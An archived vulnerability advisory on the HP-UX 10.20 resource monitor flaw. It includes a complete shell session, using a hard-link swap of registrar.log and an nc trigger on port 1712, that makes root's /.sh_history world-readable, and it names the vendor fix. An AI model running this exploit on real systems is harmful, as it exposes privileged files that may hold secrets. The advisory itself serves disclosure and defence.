TUCoPS :: HP/UX
:: resmon.htm
HP-UX 10.20 resource monitor - change any file to mode 644
Vulnerability
resource monitor
Affected
HpUX 10.20
Description
J.A. Gutierrez found following. On HP-UX 10.20 you can change any
file on the root partition to mode 644:
$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
$ ln /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log
So, /.sh_history becomes world readable, and text similar to
Event 382 occurred at Wed Nov 8 09:45:28.818524 2000
Process ID: 10931 (/etc/opt/resmon/lbin/registrar) Log Level: Error
_rm_recv: Couldn't malloc 1073803312 bytes for receive buffer
gets appended to it.
Solution
Upgrade to EMS A.03.20 release.